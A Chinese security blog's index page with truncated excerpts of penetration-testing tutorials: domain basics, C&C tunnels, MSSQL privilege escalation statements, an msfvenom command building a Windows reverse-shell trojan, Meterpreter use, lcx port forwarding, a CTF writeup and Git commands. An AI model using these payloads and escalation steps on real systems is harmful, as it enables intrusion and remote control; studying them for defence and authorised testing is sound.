刘功瑞的博客
有一天你突然惊醒,发现这一切,都只不过是一场梦。
2019年11月21日
内网渗透基础介绍 - 第二天(内网渗透基础操作、代理隧道与C&C建立)
内网渗透基础操作:1.常用基本渗透工具准备 内网渗透之端口转发与代理工具总结2.非域环境基础介绍代理隧道与C&C建立一、C&C通信 这里的C&C服务器指的是Command & Control Server--命令和控制服务器,说白了就是被控主机的遥控端。一般C&C节点分为两种,C&C Server 和 C&C Client。Server就是就是黑客手里的遥控器。Client就是被控制的电脑,也就是受害者。C&
作者:admin , 分类:内网渗透 , 浏览:492 , 评论:0
2019年11月20日
内网渗透基础介绍 - 第一天(域环境基础介绍,搭建本地测试基础多域林环境)
(该文参考整理自网上文章,相关链接附于文末)域工作组(Work Group)工作组是局域网中的一个概念,由许多在同一物理地点,而且被相同的局域网连接起来的用户组成的小组,也可以是遍布一个机构的,但却被同一网络连接的用户构成的逻辑小组。工作组是最常见最简单最普通的资源管理模式,就是将不同的电脑按功能分别列入不同的组中,加入工作组是为了区分用户计算机在网络中的类别,如果用户有工作组的话,在管理上会方便很多,可以共享/使用打印机和协和工作,很多小企业都是用这种方法来管理电脑,共享文件。工作组环境中的登
作者:admin , 分类:内网渗透 , 浏览:559 , 评论:0
2019年11月19日
XCTF 攻防世界 web进阶 filemanager writeup
先扫目录,得到源码代码审计此题入口点是二次注入。 在common.inc.php中可以看到全局进行了转义,这样常规注入少了大部分。遍观代码,输入处没有任何反转义、反解压、数字型等特殊情况,基本可以确定不存在直接的注入漏洞。 看到上传处的代码upload.php:<?php$name = basename($file["name"]);
$path_parts = pathinfo($name);if(!in_array($pat
作者:admin , 分类:CTF , 浏览:549 , 评论:0
2019年11月19日
SQL Server提权方法汇总(MSSQL)
使用sp_oacreate进行提权--提权语句--sp_configure的作用是显示或更改当前服务器的全局配置设置,执行成功返回0,失败返回1EXEC sp_configure 'show advanced options', 1; --使前面的配置生效RECONFIGURE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIG
作者:admin , 分类:数据库 , 浏览:623 , 评论:0
2019年11月16日
Meterpreter提权详解
0x01 Meterpreter自动提权1.生成后门程序我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe这里我们为生成的木马指定了payload为:windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为4444,
作者:admin , 分类:内网渗透 , 浏览:593 , 评论:0
2019年11月16日
Meterpreter命令详解
0x01初识Meterpreter1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远
作者:admin , 分类:内网渗透 , 浏览:626 , 评论:0
2019年11月16日
内网渗透之横向渗透
前言在一次测试中发现某系统存在SQL注入漏洞。且IIS可暴露绝对路径。使用--os-shell命令,填写绝对路径可执行系统命令。提权sqlmap在执行--os-shellI命令时向服务器写入了上传文件的脚本。通过文件上传可直接上传大马。简单执行几条系统命令查看该服务器基本情况。权限不够,上传cve-2018-8120.exe进行提权。cve-2018-8120.exe "whoami"cve-2018-8120.exe "
作者:admin , 分类:内网渗透 , 浏览:582 , 评论:0
2019年11月13日
内网渗透经验(代理篇)
前言最近参与内网渗透比较多,认知到自己在会话维持上过于依赖web服务,web服务一旦关闭,便失去了唯一的入口点。本次以远程桌面连接来进行说明,介绍几种常用的连接方式。本次目标主机ip为:172.16.86.153msf反弹木马使用条件:服务器通外网,拥有自己的公网ipmsf是我进行内网渗透中用的最多的工具,它内置了很多强大的功能,用起来相当方便。msf的meterpreter内置了端口转发功能,可以把内网的端口转发到本地。portfwd add -l 5555&nb
作者:admin , 分类:内网渗透 , 浏览:571 , 评论:0
2019年11月13日
内网渗透之端口转发与代理工具总结
注:文中提到的所有工具下载地址 https://github.com/Brucetg/Pentest-tools一、LCXlcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,Windows版使用方法如下:lcx有两大功能:1)端口转发(listen和slave成对使用)2)端口映射(tran)1、lcx 内网端口转发1.内网主机上执行:lcx.exe –slave 公网主机ip 公网主机端口 内网主
作者:admin , 分类:内网渗透 , 浏览:708 , 评论:0
2019年11月13日
Git常用命令总结
git config git config命令的作用是配置git的相关信息。配置全局的用户名和邮箱,mac下可通过终端输入命令cat ~/.gitconfig查看配置信息。设置用户名:git config --global user.name "name"设置用户邮箱:git config --global user.email "eamil"针对单个仓库配置用户名和邮箱,mac下可通过终端进入到项目的根目录中,然后输入命令cat .git/config
作者:admin , 分类:常用工具 , 浏览:518 , 评论:0
- 搜索
- 文章归档
- 友情链接
-
